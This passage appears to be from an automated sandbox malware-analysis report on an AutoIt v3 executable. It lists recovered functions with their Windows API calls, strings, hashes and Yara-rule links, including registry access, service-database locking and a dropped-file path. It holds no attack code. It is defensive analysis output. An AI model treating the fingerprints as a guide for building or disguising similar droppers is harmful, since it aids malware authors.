          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
          • String ID: *.*
          • API String ID: 1153243558-438819550
          • Opcode ID: a1305a49ecf7c858a081d35e2f3d5756f1fb262016dda37fe1d86d3a33c64ffa
          • Instruction ID: c223b0c6f5efbb9752c24225d0e42315e8139d0418c576e2bfd03eab87f72970
          • Opcode Fuzzy Hash: a1305a49ecf7c858a081d35e2f3d5756f1fb262016dda37fe1d86d3a33c64ffa
          • Instruction Fuzzy Hash: 597183729001199BDB2CFF58C884BEDBBB4AB54310F14CAAAE505E7240D7759AC4CFE1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113E560, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0113E5FF
          • __wsplitpath.LIBCMT ref: 0113E61C
            • Part of subcall function 0114392E: __wsplitpath_helper.LIBCMT ref: 01143970
          • _wcsncat.LIBCMT ref: 0113E633
          • __wmakepath.LIBCMT ref: 0113E64F
            • Part of subcall function 011439BE: __wmakepath_s.LIBCMT ref: 011439D4
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141546
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141560
            • Part of subcall function 011414F7: __CxxThrowException@8.LIBCMT ref: 01141571
          • _wcscpy.LIBCMT ref: 0113E687
            • Part of subcall function 0113E6C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0113E6A1), ref: 0113E6DD
          • _wcscat.LIBCMT ref: 01157324
          • _wcslen.LIBCMT ref: 01157334
          • _wcslen.LIBCMT ref: 01157345
          • _wcscat.LIBCMT ref: 0115735F
          • _wcsncpy.LIBCMT ref: 0115739F
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
          • String ID: Include$\
          • API String ID: 3173733714-3429789819
          • Opcode ID: 1e73fe888c9aa59a96f964cc42ddccc773f7ec7e4834143a5bc84f86bea5abdc
          • Instruction ID: 7b58d9e3cc664b3f9151e17a98564be3ee109c8638f5c526c5970b0ab900a1d7
          • Opcode Fuzzy Hash: 1e73fe888c9aa59a96f964cc42ddccc773f7ec7e4834143a5bc84f86bea5abdc
          • Instruction Fuzzy Hash: A251E7F14063059BC32CEF79E8C59A777E8FB99318F40493DE9A993284E7309684CB52
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011404E0, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
          Download Yara Rule
          APIs
          • GetSysColorBrush.USER32(0000000F), ref: 01140513
          • RegisterClassExW.USER32 ref: 0114053D
          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0114054E
          • InitCommonControlsEx.COMCTL32(011D90E8), ref: 0114056B
          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0114057B
          • LoadIconW.USER32 ref: 01140592
          • ImageList_ReplaceIcon.COMCTL32(0196FF38,000000FF,00000000), ref: 011405A2
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
          • API String ID: 2914291525-1005189915
          • Opcode ID: 54816e92f1b3535366cdb1b24ca66a60066d3bc2606ca7048f0feadde6ef6958
          • Instruction ID: 2dbf8c6471dbb3ae400a6c6cafc17f6c70d1effd4dd39e697260b64292fe6789
          • Opcode Fuzzy Hash: 54816e92f1b3535366cdb1b24ca66a60066d3bc2606ca7048f0feadde6ef6958
          • Instruction Fuzzy Hash: B521FCB4912218AFDB28DF94E489BDDBFB5FB08710F10822AF924A6284D7B41584CF94
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011403E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
          Download Yara Rule
          APIs
          • GetSysColorBrush.USER32(0000000F), ref: 011403EB
          • LoadCursorW.USER32(00000000,00007F00), ref: 011403FA
          • LoadIconW.USER32 ref: 01140410
          • LoadIconW.USER32 ref: 01140423
          • LoadIconW.USER32 ref: 01140436
          • LoadImageW.USER32 ref: 0114045E
          • RegisterClassExW.USER32 ref: 011404AD
            • Part of subcall function 011404E0: GetSysColorBrush.USER32(0000000F), ref: 01140513
            • Part of subcall function 011404E0: RegisterClassExW.USER32 ref: 0114053D
            • Part of subcall function 011404E0: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0114054E
            • Part of subcall function 011404E0: InitCommonControlsEx.COMCTL32(011D90E8), ref: 0114056B
            • Part of subcall function 011404E0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0114057B
            • Part of subcall function 011404E0: LoadIconW.USER32 ref: 01140592
            • Part of subcall function 011404E0: ImageList_ReplaceIcon.COMCTL32(0196FF38,000000FF,00000000), ref: 011405A2
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
          • String ID: #$0$AutoIt v3
          • API String ID: 423443420-4155596026
          • Opcode ID: 3a70fdba2fdf0d8b818515f90992cb8cfad3ed03b370e6aa4c57891cc450e453
          • Instruction ID: 331c028242239faa838c478232e4d5409c2ced787016533135bd0b1b5e37cac2
          • Opcode Fuzzy Hash: 3a70fdba2fdf0d8b818515f90992cb8cfad3ed03b370e6aa4c57891cc450e453
          • Instruction Fuzzy Hash: 29212FB0D02214AFD738DF99E885B997FB5BB4C704F0041AAE624A7284D7B05580CF95
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113A9D0, Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
          Download Yara Rule
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _malloc
          • String ID: Default
          • API String ID: 1579825452-753088835
          • Opcode ID: 49c1e837de77a98c2ffc75068ed69c96d6f36a8aeba6561d00c5c3f0f51eeeaf
          • Instruction ID: 97fd6d658855ff1244ea37753479a49dc903c34c3f0bb581c8e3974cd5021410
          • Opcode Fuzzy Hash: 49c1e837de77a98c2ffc75068ed69c96d6f36a8aeba6561d00c5c3f0f51eeeaf
          • Instruction Fuzzy Hash: 62729E70608302DFD72CDF28D484A2ABBE5AF94318F14882DE996CB359D735E845CB96
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113FE90, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 126COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __fread_nolock_fseek_memmove_strcat
          • String ID: AU3!$EA06
          • API String ID: 1268643489-2658333250
          • Opcode ID: dc7b4c2b1d83c80136c4a80eebb90be194c8f9be0eb66495cb55a033d437844c
          • Instruction ID: dad5357a6c42220f34fca48b817df71a5b26d2ac743c670eda20e575c1d5bfba
          • Opcode Fuzzy Hash: dc7b4c2b1d83c80136c4a80eebb90be194c8f9be0eb66495cb55a033d437844c
          • Instruction Fuzzy Hash: 90416B32E0414E9BDB1DCF68C880FFD3B69EB5A704F5800A9EE9587142E7309546CBA3
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01131340, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129timewindowCOMMON
          Download Yara Rule
          APIs
          • DefWindowProcW.USER32(?,?,?,?), ref: 01131376
          • KillTimer.USER32(?,00000001), ref: 011313F9
            • Part of subcall function 01131240: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0113129B
          • PostQuitMessage.USER32(00000000), ref: 0113140B
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: IconKillMessageNotifyPostProcQuitShell_TimerWindow
          • String ID: TaskbarCreated
          • API String ID: 3067442764-2362178303
          • Opcode ID: 980b409c4f960585ca3613d8021e7b1e7347804a6743cf8dd7ba68fd356846d3
          • Instruction ID: a1e9965a9b40bb85ace9ab4b7ce6da42fc70b940d4b358ee84ea21f24ad3eb44
          • Opcode Fuzzy Hash: 980b409c4f960585ca3613d8021e7b1e7347804a6743cf8dd7ba68fd356846d3
          • Instruction Fuzzy Hash: 1D411772648209EBDB3CDB68ECC5BAD7B59F790330F014626FD2587588C7B198908793
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011635B2, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01163229: _wcsncpy.LIBCMT ref: 01163241
          • _wcslen.LIBCMT ref: 011635D7
          • GetFileAttributesW.KERNELBASE(?), ref: 01163601
          • GetLastError.KERNEL32 ref: 01163610
          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01163624
          • _wcsrchr.LIBCMT ref: 0116364B
            • Part of subcall function 011635B2: CreateDirectoryW.KERNEL32(?,00000000), ref: 0116368C
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
          • String ID: \
          • API String ID: 321622961-2967466578
          • Opcode ID: 3946ff33b1fb053cb382bbcd3bbe017cc19c2424d5b91bfc6286632aa1a2dafe
          • Instruction ID: fcc087d30afcd4e22c51c4b3c8e47c25abbfe43af509bc76776552fa92c6e7f7
          • Opcode Fuzzy Hash: 3946ff33b1fb053cb382bbcd3bbe017cc19c2424d5b91bfc6286632aa1a2dafe
          • Instruction Fuzzy Hash: EE21727591131456DF28AB7CAC45FEA335CEF12714F004695ED3CD3141EB729AA88BE1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01197377, Relevance: 12.3, APIs: 8, Instructions: 267COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove$_malloc
          • String ID:
          • API String ID: 1938898002-0
          • Opcode ID: e6cbcc51feb48323bbe13250cda492e785d52c7888720e1900e45f7d7c88f389
          • Instruction ID: 365f3c4de3f4de2c73579c59f2efc12a5c944da21b210c2eed3ce708669e6e93
          • Opcode Fuzzy Hash: e6cbcc51feb48323bbe13250cda492e785d52c7888720e1900e45f7d7c88f389
          • Instruction Fuzzy Hash: 0081F772A2025A6BDB08FF68DC41EFF7768BF98608F050665FD14A3281DB35A915C7A0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119A821, Relevance: 12.3, APIs: 8, Instructions: 258registryCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0119A90F
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ConnectRegistry_memmove_wcslen
          • String ID:
          • API String ID: 15295421-0
          • Opcode ID: 58cfe68d6eb1696b858db4817205a7c2d6eaec7b82f96877ab990e701cbabb43
          • Instruction ID: 771e7953ee995ac881d87dd25355a117752fc2a4163d8d557b60f6ea82e7307c
          • Opcode Fuzzy Hash: 58cfe68d6eb1696b858db4817205a7c2d6eaec7b82f96877ab990e701cbabb43
          • Instruction Fuzzy Hash: 04A15D712143029FDB18EF24D884B5BB7F9BF94318F14891CF5A59B285DB74E848CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113E700, Relevance: 10.7, APIs: 7, Instructions: 157COMMON
          Download Yara Rule
          APIs
          • GetVersionExW.KERNEL32(?), ref: 0113E72A
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
          • GetCurrentProcess.KERNEL32(?), ref: 0113E7D4
          • GetNativeSystemInfo.KERNELBASE(?), ref: 0113E832
          • FreeLibrary.KERNEL32(?), ref: 0113E842
          • FreeLibrary.KERNEL32(?), ref: 0113E854
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
          • String ID:
          • API String ID: 3363477735-0
          • Opcode ID: e8bd2394fd5192e8f03f7fba647b89e8e77df881c24912f755c3afcabc7a71f0
          • Instruction ID: 47c8aba8b32307b930e1b086955f8f38c47e0d1ddfeae7a527d231086f8eb1a1
          • Opcode Fuzzy Hash: e8bd2394fd5192e8f03f7fba647b89e8e77df881c24912f755c3afcabc7a71f0
          • Instruction Fuzzy Hash: 1861CF70D0578AEECB19DFA8C48429DFFB0BF49304F4446AAD948A3B41C375A598CBD6
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113F3B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
          Download Yara Rule
          APIs
          • SHGetMalloc.SHELL32(0113F1FC), ref: 0113F3BD
          • SHGetDesktopFolder.SHELL32(?,011D90E8), ref: 0113F3D2
          • _wcsncpy.LIBCMT ref: 0113F3ED
          • SHGetPathFromIDListW.SHELL32(?,?), ref: 0113F427
          • _wcsncpy.LIBCMT ref: 0113F440
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
          • String ID: C:\Users\user\77066510\txoxpdjc.qnr
          • API String ID: 3170942423-3700514364
          • Opcode ID: 70a301b62fe40dd7ecbc63d89aaafb91463cb3f12833625a45d3faaed80b35f2
          • Instruction ID: 3ce649b07132dd884aca5be5a960360181342c60f0e4015eb54789c869120035
          • Opcode Fuzzy Hash: 70a301b62fe40dd7ecbc63d89aaafb91463cb3f12833625a45d3faaed80b35f2
          • Instruction Fuzzy Hash: CA218676A00219ABCB14DBA4DC84DEFB37DEF88604F108598F919D7214E730EE46DBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01131490, Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01131E00: _wcsncpy.LIBCMT ref: 01131ED2
            • Part of subcall function 01131E00: _wcscpy.LIBCMT ref: 01131EF1
            • Part of subcall function 01131E00: Shell_NotifyIconW.SHELL32(00000001,?), ref: 01131F03
          • KillTimer.USER32(?,?,?,?,?), ref: 01131513
          • SetTimer.USER32 ref: 01131522
          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 01157BC8
          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 01157C1C
          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 01157C67
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
          • String ID:
          • API String ID: 3300667738-0
          • Opcode ID: 2ea34ef84556779cc5adb92ceb44a13996fbe83cd16c549dea48db0355b7fe0d
          • Instruction ID: 5958fc3fb8e035c0225197a9a79c301c816efde7c65f187bb3fcd42eccc4203a
          • Opcode Fuzzy Hash: 2ea34ef84556779cc5adb92ceb44a13996fbe83cd16c549dea48db0355b7fe0d
          • Instruction Fuzzy Hash: F131B070A04649FFEB2ECB24CC85BE6FBBCBB46304F0401A5E59D56184C7746A88CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113E6C0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
          Download Yara Rule
          APIs
          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0113E6A1), ref: 0113E6DD
          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0113E6A1,00000000,?,?,?,0113E6A1), ref: 01157117
          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0113E6A1,?,00000000,?,?,?,?,0113E6A1), ref: 0115715E
          • RegCloseKey.ADVAPI32(?,?,?,?,0113E6A1), ref: 0115718F
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: QueryValue$CloseOpen
          • String ID: Include$Software\AutoIt v3\AutoIt
          • API String ID: 1586453840-614718249
          • Opcode ID: 772abcf963e27177b80d8d00e0ae8251a0d060e98e43652c67a85f25aca44716
          • Instruction ID: ebd988bdbdd592b912b255d0f95a1d57b05aea4bffac03e49f93cd0ad413acd7
          • Opcode Fuzzy Hash: 772abcf963e27177b80d8d00e0ae8251a0d060e98e43652c67a85f25aca44716
          • Instruction Fuzzy Hash: 8D21A272B80205BBDB28DBA8DC86FEEB7BEAF54700F100559FA15E7184EB71A605C750
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01140350, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
          Download Yara Rule
          APIs
          • CreateWindowExW.USER32 ref: 01140385
          • CreateWindowExW.USER32 ref: 011403AE
          • ShowWindow.USER32(?,00000000), ref: 011403C4
          • ShowWindow.USER32(?,00000000), ref: 011403CE
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Window$CreateShow
          • String ID: AutoIt v3$edit
          • API String ID: 1584632944-3779509399
          • Opcode ID: f217d1974cdac48cc2f0c5419eb4643baa2b1b56697eba4d8c7bf15edeb5ecf4
          • Instruction ID: ab04e5f1a332c3f65d452c8eac4decc320cdec27a95df93fd8cab175f67afbe4
          • Opcode Fuzzy Hash: f217d1974cdac48cc2f0c5419eb4643baa2b1b56697eba4d8c7bf15edeb5ecf4
          • Instruction Fuzzy Hash: BDF0B771BD13507BF63896A5AC93F963A58A728F11F30442AF710BB1C9D6F079808BD8
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01187760, Relevance: 9.2, APIs: 6, Instructions: 217COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _malloc_wcslen$_strcat_wcscpy
          • String ID:
          • API String ID: 1612042205-0
          • Opcode ID: 7f88fd4d8604ff41bb0119c669115ac619a70e0e4dfd2180615a536343dba8d6
          • Instruction ID: a27845007693d9b0802d409d08e4d372ce4740f3daad0c276fc44db19a98c9ed
          • Opcode Fuzzy Hash: 7f88fd4d8604ff41bb0119c669115ac619a70e0e4dfd2180615a536343dba8d6
          • Instruction Fuzzy Hash: 44915DB4A00206EFCB18EF68C490969BBB5FF49314B55CA59EC468B349E730E951CF91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01162FD3, Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
          Download Yara Rule
          APIs
          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,011D90E8,14000000,0115E1BD), ref: 01162FDD
          • LockServiceDatabase.ADVAPI32(00000000), ref: 01162FEA
          • UnlockServiceDatabase.ADVAPI32(00000000), ref: 01162FF5
